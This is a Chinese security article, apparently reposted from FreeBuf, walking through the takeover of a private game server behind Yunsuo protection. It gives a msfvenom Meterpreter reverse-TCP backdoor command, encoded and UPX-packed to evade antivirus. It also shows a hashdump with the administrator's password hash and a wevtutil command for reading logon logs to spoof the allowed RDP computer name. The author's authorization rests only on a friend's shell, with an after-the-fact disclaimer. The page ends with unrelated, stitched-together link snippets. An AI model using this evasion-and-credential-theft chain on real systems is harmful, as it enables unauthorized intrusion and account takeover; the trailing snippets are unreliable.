越过游戏服务器修改,“撬锁”实战:绕过云锁提权某游戏私服
原标题:“撬锁”实战:绕过云锁提权某游戏私服
严正声明:本文仅限于技术讨论与分享,严禁用于非法途径。
前言
朋友给我了我一个游戏私服的shell,说是提权不下服务器,让我帮忙看看。本文仅为大家提供一个思路,这个方法可能很多人知道但是并没有公布到网络。我今天写出来只是为了让小白们少走一点弯路,开拓一下思路,还请大牛勿喷。
请注意:本次测试已经通知管理员并已帮助其修复漏洞!
背景
朋友给我了我一个游戏私服的shell,说是提权不下服务器,让我帮忙看看。
无形之锁
连接上shell以后执行whoami:
一看2008的服务器,直接就是system权限,心里还想着这有什么不好提的。当然既然朋友说提不下,肯定没有那么简单。
执行tasklist /svc 查看运行中的任务列表:
发现有云锁。
执行net user查看系统用户:
发现云锁禁用了net。
老司机都知道,如果是安全狗就好办,只要是默认的设置,找个可读可写可执行的目录上传一个net.exe即可。但是云锁在这方面要比安全狗高明一点,你无论传到哪个目录都是不可以被执行的。本着严谨求实的态度,我还是传一下试试:
不出所料,换思路。
撬“锁”之路
其实net被禁用了没有关系,毕竟咱们是system权限,可以直接把管理员的账号密码给读取出来。
云锁终究是服务器防护软件,兼有杀毒的功能,如果是默认设置,getpassword的exp在执行过程中会被拦截。
本着严谨求实的态度,我还是读一下试试:
果然一片空白。
但是毕竟云锁可能更偏重于web应用的防护,对于可执行文件的杀毒效果远远不如360卫士之类。我们可以用msf多次编码并且加壳生成一个相对免杀云锁的后门。
具体的免杀思路我就不再赘述,freebuf以前发过类似的文章。我在这里执行的命令如下:
msfvenom -a x86 --platform win -p windows/meterpreter/reverse_tcpLHOST=xxxxx LPORT=xxxx -e x86/shikata_ga_nai -i 5 -f exe > /root/testtest.exe
然后用upx加个壳:
upx -6 /root/testtest.exe
传到目标服务器上,执行。
然后开始在msf上监听:
用msf执行下命令:
确认是目标机。
反弹出来照样调用不了net。
上hashdump:
结果如下:
wuhuijun:500:aad3b435b51404eeaad3b435b51404ee:5eb5f692224005cfd316b84f7d459d06:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
看来管理员名称为:wuhuijun。
解密hash:
密码到手。
然后就开开心心去连接mstsc。
远程端口是默认的3389:
看到这个界面,心里一阵激动。
然而事情并没有那么简单。
对方设置了计算机名限制。可能很多人到这里就会被卡住放弃。
因为如果是安全狗的话大家都知道去替换他保存计算机名的配置文件,但是云锁的话并没有这个操作。
重点思路就在这里:
因为我们毕竟已经是system权限了,我们除了关闭云锁几乎无所不能;
那么我们只要想办法弄到管理员登录的计算机名就可以了。
Windows上以文本形式输出用户登录日志 (100条数目作为数量限制)的命令如下:
wevtutil.exe qe security "/q:*[System [(EventID=4624)]]"/f:text /rd:true /c:100 > c:\sys.txt
导出后然后保存到本地查看。
远程登录的类型为3,我们只需要查找类型为3的日志:
可以看到,允许远程登录的计算机名为PC-20180525EFUP。
接下来就是修改本地计算机名:
保存重启电脑,然后去连接服务器。
成功登录:
总结
其实思路并不难,兵来将挡水来土掩,学会把手中的权限利用到极致。
本次测试仅仅作为学习,漏洞已经提交给管理员,请勿用于非法用途,所产生的一切后果与作者无关。文章如果有问题,欢迎大家及时指正,如果有什么新的想法也欢迎与我交流!
*本文作者:道恩先生666,转载请注明来自FreeBuf.COM返回搜狐,查看更多
责任编辑:
越过游戏服务器修改,“撬锁”实战:绕过云锁提权某游戏私服相关推荐
- 游戏服务器如何修改属性,游戏服务器修改数据
游戏服务器修改数据 内容精选 换一换 华为云帮助中心,为用户提供产品简介.价格说明.购买指南.用户指南.API参考.最佳实践.常见问题.视频帮助等技术文档,帮助您快速上手使用华为云服务. 规划数据服务 ...
- 实战 | Bypass云锁MySQL注入总结
MySQL特性 空格可以由其它字符替代 select id,contents,time from news where news_id=1①union②select③1,2,username④from ...
- SQL报错盲注绕过云锁
SQL报错盲注绕过云锁 有锁 还是被拦截了,怎么办? 我们要知道对方负责检测我们的语句是否存在恶意代码,对方是装了一个工具,但是工具运行要占用系统内存,对于这种防护类软件占用系统资源还是比较高的,而对 ...
- 游戏服务器开发丨采用skynet手撕万人同时在线游戏丨游戏客户端开发
用skynet手撕一个万人同时在线游戏 1. 多核并发编程 2. actor详解 3. 游戏实现原理 [技术分享篇]游戏服务器开发丨采用skynet手撕万人同时在线游戏丨游戏客户端开发 更多精彩内容包 ...
- 修改wap游戏服务器,修改wap游戏服务器
修改wap游戏服务器 内容精选 换一换 部署游戏应用前,您需要准备硬件以及华为云的环境,主要包括以下内容:硬件环境:您需要准备一台带有显卡的Windows机器,硬盘至少20G,用于运行游戏客户端.若您 ...
- 如何进入游戏服务器修改资料,怎么修改游戏服务器的信息
怎么修改游戏服务器的信息 内容精选 换一换 本节介绍如何查看云服务器的mac地址.云服务器的mac地址不支持修改.登录Linux云服务器.执行以下命令,查看云服务器的mac地址.ifconfig查看M ...
- 攻击游戏服务器 修改数据库,游戏服务器数据库修改器
游戏服务器数据库修改器 内容精选 换一换 应用容器化改造有三种方式,您可单击这里查看.本教程以某游戏为例,将该游戏进行微服务的架构改造,再进行容器化.本教程不对改造细节做深度讲解,仅讲解大致的建议.如 ...
- 自制云游戏服务器!月光Moonlight使用教程,使用串流技术将电脑游戏搬运到手机上游玩!(带外网无卡顿串流技术) (o゚▽゚)o 寻觅
文章目录 简述 服务端配置 客户端局域网连接 外网串流 对比 蒲公英 zerotier 自行添加游戏或软件 简述 先来说说什么是游戏串流,简单描述就是利用高性能电脑运行游戏,在以视频的方式发送到其他设 ...
- bigword游戏服务器文档,使用Golang实现万人同服的游戏服务器.pdf
使用Golang实现万人同服的游戏服务器 游族·袁锋峰 目 录 C O N T E N T I N D E X 00. 游戏服务器开发面临的挑战 01. 服务器开发对语言的需求 10. 使用Golan ...
最新文章
- MySQL学习之二进制日志
- 企业网络推广专员浅析企业网络推广中网站关键词排名优化有何技巧?
- ENTBOOST V1.0 发布,开源企业IM免费企业即时通讯
- c语言-命令行选项_EWSTM8系列教程06_工程节点选项配置(一)
- python ax.imshow_python – Matplotlib imshow / matshow在情节上显...
- 华中科技大学2005年计算机组成原理试题,华中科技大学200年计算机组成原理考研试题.doc...
- LVS+Keepalived实现高可用群集
- Windows核心编程_锁屏
- 嵌入式 Web Server 温度检测系统
- 用户分层,该怎么分才合理(实操版)
- 【经验贴】小汽车科目二科目三 经验
- android 录像 视频大小,Android相机 – 录制视频时预览放大
- 一步一步带你爬天猫,获取杜蕾斯评论数据
- nvcc -V和nvidia-smi中的cuda版本不同
- 使用ALLHiC基于HiC数据辅助基因组组装
- 微服务容器部署与持续集成(Jenkins)
- 50个好用的前端工具,建议收藏!
- 基于Matlab的鲁棒控制实现(一)
- cstring头文件(cstring头文件)
- 解决戴尔T640安装显卡后风扇狂飙